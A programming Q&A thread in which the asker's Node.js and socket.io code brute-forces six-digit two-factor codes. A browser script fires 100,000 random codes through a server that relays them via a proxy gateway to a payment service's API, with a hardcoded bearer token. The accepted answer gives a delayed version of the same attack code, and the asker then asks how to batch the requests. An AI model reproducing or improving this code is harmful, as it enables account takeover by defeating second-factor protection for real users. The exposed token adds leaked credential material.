# Script crashing when adding sleep

Tags: javascript, node.js

Good night.

I'm trying to use `sleep` function of `system-sleep` package, but the script crashes.

I have this code:

> index.html

```
<html lang="pt-br">

<head>
    <link rel="icon" id="favicon" href="https://conta.urpay.com.br/favicon.png"
        type="image/x-icon">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Urpay</title>

</head>

<body style='background-color:black;color:#f7f7f7'>
    <center>
        <button id="lestgo">Lest go!</button>
        <br />
        <p id="demo"></p>
    </center>

    <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
    <script src="/socket.io/socket.io.js"></script>
    <script src="assets/checker.js"></script>
</body>

</html>
```

> index.js

```
var sleep = require('system-sleep');
const app = require('express')()
const http = require('http').Server(app)
const io = require('socket.io')(http)


function meupau(config) {

    return new Promise(resolve => {
        request(config, (error, retorno, d1) => resolve(d1))
    })
}

app.get('/assets/checker.js', function (req, res) {
    res.sendFile(__dirname + '/assets/checker.js');
});

app.get('/', function (req, res) {
    res.sendFile(__dirname + '/index.html');
});

io.on('connection', socket => {
    socket.on('chk', code_2fa => {

        const x = async function () {

            var d1 = await meupau({
                url: "https://api...",
                proxy: "http://...@gate.smartproxy.com:7000",
                method: "PUT",
                body: `{"code_2fa":"${code_2fa}"}`,
                headers: {
                    'Authorization': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjVkMzg2NDUyNjQ1OWE0MDAxODcyNjQzOCIsInR5cGVMb2dpbiI6InVzZXIiLCJpc0FkbWluIjpmYWxzZSwiaWF0IjoxNTY5Mjg1NzI3LCJleHAiOjE1NjkyODY2Mjd9.WnCHzbmxsX1ggADXbhRpxEFs0hezopk39W23pwInpdw'
                }
            })
            console.log(code_2fa, d1);
        }()
    });
})

http.listen(3000, function () {
    console.log('ON');
});
```

> checker.js

```
$(document).ready(function () {

        for (i = 0; i < 100000; i++) {

            var code_2fa = randomString(6, "N");          
            testar(code_2fa)
        }

});

function randomString(len, an) {
    an = an && an.toLowerCase();
    var str = "", i = 0, min = an == "a" ? 10 : 0, max = an == "n" ? 10 : 62;
    for (; i++ < len;) {
        var r = Math.random() * (max - min) + min << 0;
        str += String.fromCharCode(r += r > 9 ? r < 36 ? 55 : 61 : 48);
    }
    return str;
}

function testar(code_2fa) {

    socket.emit('chk', code_2fa);
}
```

When i add `sleep(500);` below the line `socket.on('chk', code_2fa => {` the script crashes 
without show errors, just crash. Why does it happen ?

Comment: What is the higher level point of trying to use the `sleep(500)` because that is generally NOT how you write good server-side code in node.js.  You need the event loop to be live which means you don't want the block the interpreter in any way (same reason you use non-blocking file I/O, instead of blocking file I/O). If we understand what you're trying to accomplish, we can likely suggest a better way.

Comment: I want to add a delay before each request

Comment: @NOAHBOL, why? thats not a good design.  Your node.js server should be awake and able to respond to client requests, if its asleep then it can't respond and will miss the requests.

Comment: @NOAHBOL 1) Did you post the complete source code of checker.js? I don't see where socket connection is being made. 2) What if the for-loop in checker.js makes only one iteration (i < 1 instead of 100000)? Does the server-side script crash anyway?

Answer (score 0, accepted):

It is not clear what you're really trying to accomplish or why, but if you really want to add a delay to the processing of an arriving `chk` message, you can just use `setTimeout()`:

```
io.on('connection', socket => {
    socket.on('chk', code_2fa => {

        setTimeout(function() {

            const x = async function () {

                var d1 = await meupau({
                    url: "https://api...",
                    proxy: "http://...@gate.smartproxy.com:7000",
                    method: "PUT",
                    body: `{"code_2fa":"${code_2fa}"}`,
                    headers: {
                        'Authorization': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjVkMzg2NDUyNjQ1OWE0MDAxODcyNjQzOCIsInR5cGVMb2dpbiI6InVzZXIiLCJpc0FkbWluIjpmYWxzZSwiaWF0IjoxNTY5Mjg1NzI3LCJleHAiOjE1NjkyODY2Mjd9.WnCHzbmxsX1ggADXbhRpxEFs0hezopk39W23pwInpdw'
                    }
                })
                console.log(code_2fa, d1);
            }()
        }, 500);
    });
});
```

This won't require any external library and won't block the event loop for other requests to run and do their job.

P.S. I'm guess that this is some sort of work-around to some other "real" problem. You should probably ask about the real problem, not about issues with the work-around.

Comment: Sorry to bother you again, but I need the script not to send all numbers (`code_2fa`) at once. I need my `checker.js` to send 100 numbers every 3 seconds.

Comment: @NOAHBOL - That's a different question.  I'd suggest you learn from this question, finish this question (accepting an answer if your original question has been answered) and try some things yourself for the new problem.  If you're still stuck, then post a new question describing the new problem.  Also please describe why you're asking for what you're asking so people may have the opportunity to suggest a better solution than what you're asking for.